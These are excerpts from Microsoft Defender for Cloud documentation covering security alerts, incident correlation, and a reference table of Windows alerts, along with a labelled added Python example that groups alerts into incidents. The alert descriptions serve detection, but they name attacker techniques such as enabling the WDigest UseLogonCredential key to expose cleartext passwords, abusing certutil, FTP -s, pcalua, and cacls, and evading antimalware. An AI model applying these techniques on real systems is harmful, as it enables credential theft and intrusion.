| Contains sensitive data (Prerequisite: Enable data-aware security for storage accounts in Defender CSPM, or leverage Microsoft Purview Data Catalog to protect sensitive data.) | Indicates that a resource contains sensitive data. | MDC Sensitive data discovery: Azure Storage Account, Azure Storage Account Container, AWS S3 bucket, Azure SQL Server (preview), Azure SQL Database (preview), RDS Instance (preview), RDS Instance Database (preview), RDS Cluster (preview). Purview Sensitive data discovery (preview): Azure Storage Account, Azure Storage Account Container, AWS S3 bucket, Azure SQL Server, Azure SQL Database, Azure Data Lake Storage Gen2, Azure Database for PostgreSQL, Azure Database for MySQL, Azure Synapse Analytics, Azure Cosmos DB accounts, GCP cloud storage bucket |
| Moves data to (Preview) | Indicates that a resource transfers its data to another resource | Storage account container, AWS S3, AWS RDS instance, AWS RDS cluster |
| Gets data from (Preview) | Indicates that a resource gets its data from another resource | Storage account container, AWS S3, AWS RDS instance, AWS RDS cluster |
| Has tags | Lists the resource tags of the cloud resource | All Azure, AWS, and GCP resources |
| Installed software | Lists all software installed on the machine. This insight is applicable only for VMs that have threat and vulnerability management integration with Defender for Cloud enabled and are connected to Defender for Cloud. | Azure virtual machine, AWS EC2 |
| Allows public access | Indicates that public read access is allowed to the resource with no authorization required. Learn more | Azure storage account, AWS S3 bucket, GitHub repository, GCP cloud storage bucket |
| Doesn't have MFA enabled | Indicates that the user account does not have a multi-factor authentication solution enabled | Azure AD User account, IAM user |
| Is external user | Indicates that the user account is outside the organization's domain | Azure AD User account |
| Is managed | Indicates that an identity is managed by the cloud provider | Azure Managed Identity |
| Contains common usernames | Indicates that a SQL server has user accounts with common usernames which are prone to brute force attacks. | SQL VM, Arc-Enabled SQL VM |
| Can execute code on the host | Indicates that a SQL server allows executing code on the underlying VM using a built-in mechanism such as xp_cmdshell. | SQL VM, Arc-Enabled SQL VM |
| Has vulnerabilities | Indicates that the resource SQL server has vulnerabilities detected | SQL VM, Arc-Enabled SQL VM |
| DEASM findings | Microsoft Defender External Attack Surface Management (DEASM) internet scanning findings | Public IP |
| Privileged container | Indicates that a Kubernetes container runs in a privileged mode | Kubernetes container |
| Uses host network | Indicates that a Kubernetes pod uses the network namespace of its host machine | Kubernetes pod |
| Has high severity vulnerabilities | Indicates that a resource has high severity vulnerabilities | Azure VM, AWS EC2, Container image, GCP VM instance |
| Vulnerable to remote code execution | Indicates that a resource has vulnerabilities allowing remote code execution | Azure VM, AWS EC2, Container image, GCP VM instance |
| Public IP metadata | Lists the metadata of a Public IP | Public IP |
| Identity metadata | Lists the metadata of an identity | Azure AD Identity |

Connections

| Connection | Description | Source entity types | Destination entity types |
|---|---|---|---|
| Can authenticate as | Indicates that an Azure resource can authenticate to an identity and use its privileges | Azure VM, Azure VMSS, Azure Storage Account, Azure App Services, SQL Servers | Azure AD managed identity |
| Has permission to | Indicates that an identity has permissions to a resource or a group of resources | Azure AD user account, Managed Identity, IAM user, EC2 instance | All Azure & AWS resources |
| Contains | Indicates that the source entity contains the target entity | Azure subscription, Azure resource group, AWS account, Kubernetes namespace, Kubernetes pod, Kubernetes cluster, GitHub owner, Azure DevOps project, Azure DevOps organization, Azure SQL server, RDS Cluster, RDS Instance, GCP project, GCP Folder, GCP Organization | All Azure, AWS, and GCP resources, All Kubernetes entities, All DevOps entities, Azure SQL database, RDS Instance, RDS Instance Database |
| Routes traffic to | Indicates that the source entity can route network traffic to the target entity | Public IP, Load Balancer, VNET, Subnet, VPC, Internet Gateway, Kubernetes service, Kubernetes pod | Azure VM, Azure VMSS, AWS EC2, Subnet, Load Balancer, Internet gateway, Kubernetes pod, Kubernetes service, GCP VM instance, GCP instance group |
| Is running | Indicates that the source entity is running the target entity as a process | Azure VM, EC2, Kubernetes container | SQL, Arc-Enabled SQL, Hosted MongoDB, Hosted MySQL, Hosted Oracle, Hosted PostgreSQL, Hosted SQL Server, Container image, Kubernetes pod |
| Member of | Indicates that the source identity is a member of the target identities group | Azure AD group, Azure AD user | Azure AD group |
| Maintains | Indicates that the source Kubernetes entity manages the life cycle of the target Kubernetes entity | Kubernetes workload controller, Kubernetes replica set, Kubernetes stateful set, Kubernetes daemon set, Kubernetes jobs, Kubernetes cron job | Kubernetes pod |


Next steps 


- Identify and analyze risks across your environment
- Identify and remediate attack paths
- Cloud security explorer




Security alerts and incidents

Article • 05/29/2023

This article describes security alerts and notifications in Microsoft Defender for Cloud.

What are security alerts?

Security alerts are the notifications generated by Defender for Cloud's workload protection plans when threats are identified in your Azure, hybrid, or multicloud environments.


- Security alerts are triggered by advanced detections available when you enable Defender plans for specific resource types.
- Each alert provides details of affected resources, issues, and remediation steps.
- Defender for Cloud classifies alerts and prioritizes them by severity.
- Alerts are displayed in the portal for 90 days, even if the resource related to the alert was deleted during that time. This is because the alert might indicate a potential breach to your organization that needs to be further investigated.
- Alerts can be exported to CSV format.
- Alerts can also be streamed directly to a Security Information and Event Management (SIEM) such as Microsoft Sentinel, Security Orchestration Automated Response (SOAR), or IT Service Management (ITSM) solution.
- Defender for Cloud leverages the MITRE ATT&CK matrix to associate alerts with their perceived intent, helping formalize security domain knowledge.


How are alerts classified? 


Alerts have a severity level assigned to help prioritize how to attend to each alert.

Severity is based on:

- The specific trigger
- The confidence level that there was malicious intent behind the activity that led to the alert

| Severity | Recommended response |
|---|---|
| High | There is a high probability that your resource is compromised. You should look into it right away. Defender for Cloud has high confidence in both the malicious intent and in the findings used to issue the alert. For example, an alert that detects the execution of a known malicious tool such as Mimikatz, a common tool used for credential theft. |
| Medium | This is probably a suspicious activity that might indicate that a resource is compromised. Defender for Cloud's confidence in the analytic or finding is medium and the confidence of the malicious intent is medium to high. These would usually be machine learning or anomaly based detections, for example a sign-in attempt from an unusual location. |
| Low | This might be a benign positive or a blocked attack. Defender for Cloud isn't confident enough that the intent is malicious and the activity might be innocent. For example, log clear is an action that might happen when an attacker tries to hide their tracks, but in many cases is a routine operation performed by admins. Defender for Cloud doesn't usually tell you when attacks were blocked, unless it's an interesting case that we suggest you look into. |
| Informational | An incident is typically made up of a number of alerts, some of which might appear on their own to be only informational, but in the context of the other alerts might be worthy of a closer look. |


What are security incidents? 


A security incident is a collection of related alerts. 


Incidents provide you with a single view of an attack and its related alerts, so that you 
can quickly understand the actions an attacker took, and the affected resources. 


As the breadth of threat coverage grows, so does the need to detect even the slightest compromise. It's challenging for security analysts to triage different alerts and identify an actual attack. By correlating alerts and low fidelity signals into security incidents, Defender for Cloud helps analysts cope with this alert fatigue.

In the cloud, attacks can occur across different tenants. Defender for Cloud can combine AI algorithms to analyze attack sequences that are reported on each Azure subscription. This technique identifies the attack sequences as prevalent alert patterns, instead of just being incidentally associated with each other.


During an investigation of an incident, analysts often need extra context to reach a 
verdict about the nature of the threat and how to mitigate it. For example, even when a 
network anomaly is detected, without understanding what else is happening on the 
network or with regard to the targeted resource, it's difficult to understand what actions 
to take next. To help, a security incident can include artifacts, related events, and 
information. The additional information available for security incidents varies, depending 
on the type of threat detected and the configuration of your environment. 


Correlating alerts into incidents

Defender for Cloud correlates alerts and contextual signals into incidents.

- Correlation looks at different signals across resources and combines security knowledge and AI to analyze alerts, discovering new attack patterns as they occur.
- By using the information gathered for each step of an attack, Defender for Cloud can also rule out activity that appears to be steps of an attack, but actually isn't.
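As an added example (not code from the Defender for Cloud documentation or product), the following Python sketch shows the correlation idea described above: alerts on the same entity that arrive within a time window are grouped into one incident, the incident takes the highest severity of its members, and an informational alert such as a cleared event log becomes part of the incident's story instead of being triaged alone. The alert records and their field names are constructed for this example and are not Defender for Cloud's CSV or continuous export schema.

```python
"""Added example, not Defender for Cloud code: group alerts into incidents.

The alert fields used here (alert_type, severity, compromised_entity,
start_time, mitre_tactics) are assumptions made for this example, not the
schema of Defender for Cloud's CSV or continuous export.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Severity order from the table above: higher rank, look sooner.
SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}


@dataclass
class Alert:
    alert_type: str
    severity: str
    compromised_entity: str
    start_time: datetime
    mitre_tactics: tuple = ()


@dataclass
class Incident:
    entity: str
    alerts: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        """An incident is as severe as its most severe member alert."""
        return max((a.severity for a in self.alerts), key=SEVERITY_RANK.__getitem__)

    @property
    def tactics(self) -> list:
        """MITRE tactics of the member alerts, in order of first appearance."""
        seen = []
        for a in sorted(self.alerts, key=lambda x: x.start_time):
            for t in a.mitre_tactics:
                if t not in seen:
                    seen.append(t)
        return seen


def correlate(alerts, window=timedelta(hours=1)):
    """Group alerts that hit the same entity within `window` of the previous
    alert on that entity. Returns incidents ordered by severity, then by
    alert count, so the analyst sees the most urgent group first."""
    incidents, open_by_entity = [], {}
    for a in sorted(alerts, key=lambda x: x.start_time):
        current = open_by_entity.get(a.compromised_entity)
        if current and a.start_time - current.alerts[-1].start_time <= window:
            current.alerts.append(a)          # continues an open incident
        else:
            current = Incident(a.compromised_entity, [a])
            open_by_entity[a.compromised_entity] = current
            incidents.append(current)
    return sorted(incidents,
                  key=lambda i: (SEVERITY_RANK[i.severity], len(i.alerts)),
                  reverse=True)


# Constructed sample alerts: names come from the alert reference on this page;
# times, entity names and tactics are made up for the example.
T = datetime(2023, 6, 1)
SAMPLE_ALERTS = [
    Alert("Antimalware Action Taken", "Medium", "vm-db-02", T.replace(hour=9)),
    Alert("An event log was cleared", "Informational", "vm-web-01",
          T.replace(hour=10)),
    Alert("Antimalware disabled in your virtual machine (VM_AmDisablement)",
          "Medium", "vm-web-01", T.replace(hour=10, minute=5),
          ("Defense Evasion",)),
    Alert("Custom script extension with suspicious command in your virtual "
          "machine (VM_CustomScriptExtensionSuspiciousCmd)", "Medium",
          "vm-web-01", T.replace(hour=10, minute=12), ("Execution",)),
    Alert("A logon from a malicious IP has been detected.", "High",
          "vm-web-01", T.replace(hour=16)),
]

if __name__ == "__main__":
    for inc in correlate(SAMPLE_ALERTS):
        print(f"{inc.severity:<13} {inc.entity:<10} alerts={len(inc.alerts)} "
              f"tactics={inc.tactics}")
        for a in inc.alerts:
            print(f"    {a.start_time:%H:%M} [{a.severity}] {a.alert_type}")
```

The cleared event log on vm-web-01 is informational on its own, but lands inside the same incident as the antimalware disablement and the suspicious custom script extension that followed it within minutes; the malicious-IP logon six hours later opens a separate incident.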


Tip

In the incidents reference, review the list of security incidents that can be produced by incident correlation.


How does Defender for Cloud detect threats? 


To detect real threats and reduce false positives, Defender for Cloud monitors resources, 
collects, and analyzes data for threats, often correlating data from multiple sources. 


[Figure: Monitor traffic, Collect logs, Analyze data for threats, Present this information in a single dashboard]


Microsoft initiatives 


Microsoft Defender for Cloud benefits from having security research and data science 
teams throughout Microsoft who continuously monitor for changes in the threat 
landscape. This includes the following initiatives: 


- Microsoft security specialists: Ongoing engagement with teams across Microsoft that work in specialized security fields, like forensics and web attack detection.
- Microsoft security research: Our researchers are constantly on the lookout for threats. Because of our global presence in the cloud and on-premises, we have access to an expansive set of telemetry. The wide-reaching and diverse collection of datasets enables us to discover new attack patterns and trends across our on-premises consumer and enterprise products, as well as our online services. As a result, Defender for Cloud can rapidly update its detection algorithms as attackers release new and increasingly sophisticated exploits. This approach helps you keep pace with a fast moving threat environment.
- Threat intelligence monitoring: Threat intelligence includes mechanisms, indicators, implications, and actionable advice about existing or emerging threats. This information is shared in the security community and Microsoft continuously monitors threat intelligence feeds from internal and external sources.
- Signal sharing: Insights from security teams across Microsoft's broad portfolio of cloud and on-premises services, servers, and client endpoint devices are shared and analyzed.
- Detection tuning: Algorithms are run against real customer data sets and security researchers work with customers to validate the results. True and false positives are used to refine machine learning algorithms.


These combined efforts culminate in new and improved detections, which you can 
benefit from instantly — there's no action for you to take. 


Security analytics 


Defender for Cloud employs advanced security analytics, which go far beyond signature-based approaches. Breakthroughs in big data and machine learning technologies are leveraged to evaluate events across the entire cloud fabric, detecting threats that would be impossible to identify using manual approaches and predicting the evolution of attacks. These security analytics include:


Integrated threat intelligence 


Microsoft has an immense amount of global threat intelligence. Telemetry flows in from 
multiple sources, such as Azure, Microsoft 365, Microsoft CRM online, Microsoft 
Dynamics AX, outlook.com, MSN.com, the Microsoft Digital Crimes Unit (DCU), and 
Microsoft Security Response Center (MSRC). Researchers also receive threat intelligence 
information that is shared among major cloud service providers and feeds from other 
third parties. Microsoft Defender for Cloud can use this information to alert you to 
threats from known bad actors. 


Behavioral analytics 


Behavioral analytics is a technique that analyzes and compares data to a collection of known patterns. However, these patterns are not simple signatures. They are determined through complex machine learning algorithms that are applied to massive datasets. They are also determined through careful analysis of malicious behaviors by expert analysts. Microsoft Defender for Cloud can use behavioral analytics to identify compromised resources based on analysis of virtual machine logs, virtual network device logs, fabric logs, and other sources.


Anomaly detection 


Defender for Cloud also uses anomaly detection to identify threats. In contrast to behavioral analytics that depends on known patterns derived from large data sets, anomaly detection is more "personalized" and focuses on baselines that are specific to your deployments. Machine learning is applied to determine normal activity for your deployments and then rules are generated to define outlier conditions that could represent a security event.


Exporting alerts 


You have a range of options for viewing your alerts outside of Defender for Cloud, including:

- Download CSV report on the alerts dashboard provides a one-time export to CSV.
- Continuous export from Environment settings allows you to configure streams of security alerts and recommendations to Log Analytics workspaces and Event Hubs. Learn more.
- Microsoft Sentinel connector streams security alerts from Microsoft Defender for Cloud into Microsoft Sentinel. Learn more.


Learn about streaming alerts to a SIEM, SOAR, or IT Service Management solution and 
how to continuously export data. 


Next steps 


In this article, you learned about the different types of alerts available in Defender for 
Cloud. For more information, see: 


- Security alerts in Azure Activity log - In addition to being available in the Azure portal or programmatically, security alerts and incidents are audited as events in Azure Activity Log
- Reference table of Defender for Cloud alerts
- Respond to security alerts
- Learn how to manage security incidents in Defender for Cloud.


Security alerts - a reference guide

Article • 05/31/2023

This article lists the security alerts you might get from Microsoft Defender for Cloud and any Microsoft Defender plans you've enabled. The alerts shown in your environment depend on the resources and services you're protecting, and your customized configuration.

At the bottom of this page, there's a table describing the Microsoft Defender for Cloud kill chain aligned with version 9 of the MITRE ATT&CK matrix.

Learn how to respond to these alerts.

Learn how to export alerts.

Note

Alerts from different sources might take different amounts of time to appear. For example, alerts that require analysis of network traffic might take longer to appear than alerts related to suspicious processes running on virtual machines.

Alerts for Windows machines

Microsoft Defender for Servers Plan 2 provides unique detections and alerts, in addition to the ones provided by Microsoft Defender for Endpoint. The alerts provided for Windows machines are:


| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| A logon from a malicious IP has been detected. [seen multiple times] | A successful remote authentication for the account [account] and process [process] occurred, however the logon IP address (x.x.x.x) has previously been reported as malicious or highly unusual. A successful attack has probably occurred. Files with the .scr extension are screen saver files and normally reside and execute from the Windows system directory. | - | High |
| Addition of Guest account to Local Administrators group | Analysis of host data has detected the addition of the built-in Guest account to the Local Administrators group on %{Compromised Host}, which is strongly associated with attacker activity. | - | Medium |
| An event log was cleared | Machine logs indicate a suspicious event log clearing operation by user: '%{user name}' in Machine: '%{CompromisedEntity}'. The %{log channel} log was cleared. | - | Informational |
| Antimalware Action Failed | Microsoft Antimalware has encountered an error when taking an action on malware or other potentially unwanted software. | - | Medium |
| Antimalware Action Taken | Microsoft Antimalware for Azure has taken an action to protect this machine from malware or other potentially unwanted software. | - | Medium |


| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Antimalware broad files exclusion in your virtual machine (VM_AmBroadFilesExclusion) | Files exclusion from antimalware extension with broad exclusion rule was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Such an exclusion practically disables the Antimalware protection. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |
| Antimalware disabled and code execution in your virtual machine (VM_AmDisablementAndCodeExecution) | Antimalware disabled at the same time as code execution on your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers disable antimalware scanners to prevent detection while running unauthorized tools or infecting the machine with malware. | Defense Evasion, Execution | High |
| Antimalware disabled in your virtual machine (VM_AmDisablement) | Antimalware disabled in your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might disable the antimalware on your virtual machine to prevent detection. | Defense Evasion | Medium |
| Antimalware file exclusion and code execution in your virtual machine (VM_AmFileExclusionAndCodeExecution) | File excluded from your antimalware scanner at the same time as code was executed via a custom script extension on your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running unauthorized tools or infecting the machine with malware. | Defense Evasion, Execution | High |
| Antimalware file exclusion and code execution in your virtual machine (VM_AmTempFileExclusionAndCodeExecution) | Temporary file exclusion from antimalware extension in parallel to execution of code via custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running arbitrary code or infecting the machine with malware. | Defense Evasion, Execution | High |
| Antimalware file exclusion in your virtual machine (VM_AmTempFileExclusion) | File excluded from your antimalware scanner on your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running unauthorized tools or infecting the machine with malware. | Defense Evasion | Medium |
| Antimalware real-time protection was disabled in your virtual machine (VM_AmRealtimeProtectionDisabled) | Real-time protection disablement of the antimalware extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might disable real-time protection from the antimalware scan on your virtual machine to avoid detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |


| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Antimalware real-time protection was disabled temporarily in your virtual machine (VM_AmTempRealtimeProtectionDisablement) | Real-time protection temporary disablement of the antimalware extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might disable real-time protection from the antimalware scan on your virtual machine to avoid detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |
| Antimalware real-time protection was disabled temporarily while code was executed in your virtual machine (VM_AmRealtimeProtectionDisablementAndCodeExec) | Real-time protection temporary disablement of the antimalware extension in parallel to code execution via custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might disable real-time protection from the antimalware scan on your virtual machine to avoid detection while running arbitrary code or infecting the machine with malware. | - | High |
| Antimalware scans blocked for files potentially related to malware campaigns on your virtual machine (Preview) (VM_AmMalwareCampaignRelatedExclusion) | An exclusion rule was detected in your virtual machine to prevent your antimalware extension scanning certain files that are suspected of being related to a malware campaign. The rule was detected by analyzing the Azure Resource Manager operations in your subscription. Attackers might exclude files from antimalware scans to prevent detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |
| Antimalware temporarily disabled in your virtual machine (VM_AmTemporarilyDisablement) | Antimalware temporarily disabled in your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might disable the antimalware on your virtual machine to prevent detection. | - | Medium |
| Antimalware unusual file exclusion in your virtual machine (VM_UnusualAmFileExclusion) | Unusual file exclusion from antimalware extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |
| Communication with suspicious domain identified by threat intelligence (AzureDNS_ThreatIntelSuspectDomain) | Communication with suspicious domain was detected by analyzing DNS transactions from your resource and comparing against known malicious domains identified by threat intelligence feeds. Communication to malicious domains is frequently performed by attackers and could imply that your resource is compromised. | Initial Access, Persistence, Execution, Command And Control, Exploitation | Medium |
| Custom script extension with suspicious command in your virtual machine (VM_CustomScriptExtensionSuspiciousCmd) | Custom script extension with suspicious command was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extension to execute malicious code on your virtual machine via the Azure Resource Manager. | Execution | Medium |


| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Custom script extension with suspicious entry-point in your virtual machine (VM_CustomScriptExtensionSuspiciousEntryPoint) | Custom script extension with a suspicious entry-point was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. The entry-point refers to a suspicious GitHub repository. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager. | Execution | Medium |
| Custom script extension with suspicious payload in your virtual machine (VM_CustomScriptExtensionSuspiciousPayload) | Custom script extension with a payload from a suspicious GitHub repository was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager. | Execution | Medium |
| Detected actions indicative of disabling and deleting IIS log files | Analysis of host data detected actions that show IIS log files being disabled and/or deleted. | - | Medium |
| Detected anomalous mix of upper and lower case characters in command-line | Analysis of host data on %{Compromised Host} detected a command line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host. | - | Medium |
| Detected change to a registry key that can be abused to bypass UAC | Analysis of host data on %{Compromised Host} detected that a registry key that can be abused to bypass UAC (User Account Control) was changed. This kind of configuration, while possibly benign, is also typical of attacker activity when trying to move from unprivileged (standard user) to privileged (for example administrator) access on a compromised host. | - | Medium |
| Detected decoding of an executable using built-in certutil.exe tool | Analysis of host data on %{Compromised Host} detected that certutil.exe, a built-in administrator utility, was being used to decode an executable instead of its mainstream purpose that relates to manipulating certificates and certificate data. Attackers are known to abuse functionality of legitimate administrator tools to perform malicious actions, for example using a tool such as certutil.exe to decode a malicious executable that will then be subsequently executed. | - | High |
| Detected enabling of the WDigest UseLogonCredential registry key | Analysis of host data detected a change in the registry key HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ "UseLogonCredential". Specifically this key has been updated to allow logon credentials to be stored in clear text in LSA memory. Once enabled, an attacker can dump clear text passwords from LSA memory with credential harvesting tools such as Mimikatz. | - | Medium |


Alert (alert type): Detected encoded executable in command line data
Description: Analysis of host data on %{Compromised Host} detected a base-64 encoded executable. This has previously been associated with attackers attempting to construct executables on-the-fly through a sequence of commands, and attempting to evade intrusion detection systems by ensuring that no individual command would trigger an alert. This could be legitimate activity, or an indication of a compromised host.
MITRE tactics: -
Severity: High

Alert (alert type): Detected obfuscated command line
Description: Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on %{Compromised Host} detected suspicious indicators of obfuscation on the command line.
MITRE tactics: -
Severity: Informational

Alert (alert type): Detected Petya ransomware indicators
Description: Analysis of host data on %{Compromised Host} detected indicators associated with Petya ransomware. See https://aka.ms/petya-blog for more information. Review the command line associated with this alert and escalate this alert to your security team.
MITRE tactics: -
Severity: High

Alert (alert type): Detected possible execution of keygen executable
Description: Analysis of host data on %{Compromised Host} detected execution of a process whose name is indicative of a keygen tool; such tools are typically used to defeat software licensing mechanisms, but their download is often bundled with other malicious software. Activity group GOLD has been known to make use of such keygens to covertly gain back door access to hosts that they compromise.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected possible execution of malware dropper
Description: Analysis of host data on %{Compromised Host} detected a filename that has previously been associated with one of activity group GOLD's methods of installing malware on a victim host.
MITRE tactics: -
Severity: High

Alert (alert type): Detected possible local reconnaissance activity
Description: Analysis of host data on %{Compromised Host} detected a combination of systeminfo commands that has previously been associated with one of activity group GOLD's methods of performing reconnaissance activity. While 'systeminfo.exe' is a legitimate Windows tool, executing it twice in succession in the way that has occurred here is rare.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected potentially suspicious use of Telegram tool
Description: Analysis of host data shows installation of Telegram, a free cloud-based instant messaging service that exists for both mobile and desktop systems. Attackers are known to abuse this service to transfer malicious binaries to any other computer, phone, or tablet.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected suppression of legal notice displayed to users at logon
Description: Analysis of host data on %{Compromised Host} detected changes to the registry key that controls whether a legal notice is displayed to users when they log on. Microsoft security analysis has determined that this is a common activity undertaken by attackers after having compromised a host.
MITRE tactics: -
Severity: Low


Alert (alert type): Detected suspicious combination of HTA and PowerShell
Description: mshta.exe (Microsoft HTML Application Host), which is a signed Microsoft binary, is being used by attackers to launch malicious PowerShell commands. Attackers often resort to having an HTA file with inline VBScript. When a victim browses to the HTA file and chooses to run it, the PowerShell commands and scripts that it contains are executed. Analysis of host data on %{Compromised Host} detected mshta.exe launching PowerShell commands.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected suspicious commandline arguments
Description: Analysis of host data on %{Compromised Host} detected suspicious command-line arguments that have been used in conjunction with a reverse shell used by activity group HYDROGEN.
MITRE tactics: -
Severity: High

Alert (alert type): Detected suspicious commandline used to start all executables in a directory
Description: Analysis of host data has detected a suspicious process running on %{Compromised Host}. The command line indicates an attempt to start all executables (*.exe) that may reside in a directory. This could be an indication of a compromised host.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected suspicious credentials in commandline
Description: Analysis of host data on %{Compromised Host} detected a suspicious password being used to execute a file by activity group BORON. This activity group has been known to use this password to execute Pirpi malware on a victim host.
MITRE tactics: -
Severity: High

Alert (alert type): Detected suspicious document credentials
Description: Analysis of host data on %{Compromised Host} detected a suspicious, common precomputed password hash used by malware being used to execute a file. Activity group HYDROGEN has been known to use this password to execute malware on a victim host.
MITRE tactics: -
Severity: High

Alert (alert type): Detected suspicious execution of VBScript.Encode command
Description: Analysis of host data on %{Compromised Host} detected the execution of the VBScript.Encode command. This encodes scripts into unreadable text, making it more difficult for users to examine the code. Microsoft threat research shows that attackers often use encoded VBScript files as part of their attack to evade detection systems. This could be legitimate activity, or an indication of a compromised host.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected suspicious execution via rundll32.exe
Description: Analysis of host data on %{Compromised Host} detected rundll32.exe being used to execute a process with an uncommon name, consistent with the process naming scheme previously seen used by activity group GOLD when installing their first stage implant on a compromised host.
MITRE tactics: -
Severity: High

Alert (alert type): Detected suspicious file cleanup commands
Description: Analysis of host data on %{Compromised Host} detected a combination of systeminfo commands that has previously been associated with one of activity group GOLD's methods of performing post-compromise self-cleanup activity. While 'systeminfo.exe' is a legitimate Windows tool, executing it twice in succession, followed by a delete command, in the way that has occurred here is rare.
MITRE tactics: -
Severity: High


Alert (alert type): Detected suspicious file creation
Description: Analysis of host data on %{Compromised Host} detected creation or execution of a process that has previously indicated post-compromise action taken on a victim host by activity group BARIUM. This activity group has been known to use this technique to download more malware to a compromised host after an attachment in a phishing doc has been opened.
MITRE tactics: -
Severity: High

Alert (alert type): Detected suspicious named pipe communications
Description: Analysis of host data on %{Compromised Host} detected data being written to a local named pipe from a Windows console command. Named pipes are known to be a channel used by attackers to task and communicate with a malicious implant. This could be legitimate activity, or an indication of a compromised host.
MITRE tactics: -
Severity: High

Alert (alert type): Detected suspicious network activity
Description: Analysis of network traffic from %{Compromised Host} detected suspicious network activity. Such traffic, while possibly benign, is typically used by an attacker to communicate with malicious servers for downloading of tools, command-and-control and exfiltration of data. Typical related attacker activity includes copying remote administration tools to a compromised host and exfiltrating user data from it.
MITRE tactics: -
Severity: Low

Alert (alert type): Detected suspicious new firewall rule
Description: Analysis of host data detected a new firewall rule has been added via netsh.exe to allow traffic from an executable in a suspicious location.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected suspicious use of Cacls to lower the security state of the system
Description: Attackers use myriad ways like brute force, spear phishing etc. to achieve initial compromise and get a foothold on the network. Once initial compromise is achieved they often take steps to lower the security settings of a system. Cacls (short for change access control list) is a native Microsoft Windows command-line utility often used for modifying the security permissions on folders and files. The binary is often used by attackers to lower the security settings of a system, by giving Everyone full access to some of the system binaries such as ftp.exe, net.exe, wscript.exe etc. Analysis of host data on %{Compromised Host} detected suspicious use of Cacls to lower the security of a system.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected suspicious use of FTP -s Switch
Description: Analysis of process creation data from %{Compromised Host} detected the use of the FTP "-s:filename" switch. This switch is used to specify an FTP script file for the client to run. Malware or malicious processes are known to use this FTP switch (-s:filename) to point to a script file that is configured to connect to a remote FTP server and download more malicious binaries.
MITRE tactics: -
Severity: Medium


Alert (alert type): Detected suspicious use of Pcalua.exe to launch executable code
Description: Analysis of host data on %{Compromised Host} detected the use of pcalua.exe to launch executable code. Pcalua.exe is a component of the Microsoft Windows "Program Compatibility Assistant", which detects compatibility issues during the installation or execution of a program. Attackers are known to abuse the functionality of legitimate Windows system tools to perform malicious actions, for example using pcalua.exe with the -a switch to launch malicious executables either locally or from remote shares.
MITRE tactics: -
Severity: Medium

Alert (alert type): Detected the disabling of critical services
Description: The analysis of host data on %{Compromised Host} detected execution of a "net.exe stop" command being used to stop critical services like SharedAccess or the Windows Security app. The stopping of either of these services can be an indication of malicious behavior.
MITRE tactics: -
Severity: Medium

Alert (alert type): Digital currency mining related behavior detected
Description: Analysis of host data on %{Compromised Host} detected the execution of a process or command normally associated with digital currency mining.
MITRE tactics: -
Severity: High

Alert (alert type): Dynamic PS script construction
Description: Analysis of host data on %{Compromised Host} detected a PowerShell script being constructed dynamically. Attackers sometimes use this approach of progressively building up a script in order to evade IDS systems. This could be legitimate activity, or an indication that one of your machines has been compromised.
MITRE tactics: -
Severity: Medium

Alert (alert type): Executable found running from a suspicious location
Description: Analysis of host data detected an executable file on %{Compromised Host} that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.
MITRE tactics: -
Severity: High

Alert (alert type): Fileless attack behavior detected (VM_FilelessAttackBehavior.Windows)
Description: The memory of the process specified contains behaviors commonly used by fileless attacks. Specific behaviors include:
1) Shellcode, which is a small piece of code typically used as the payload in the exploitation of a software vulnerability.
2) Active network connections. See NetworkConnections below for details.
3) Function calls to security sensitive operating system interfaces. See Capabilities below for referenced OS capabilities.
4) Contains a thread that was started in a dynamically allocated code segment. This is a common pattern for process injection attacks.
MITRE tactics: Defense Evasion
Severity: Low


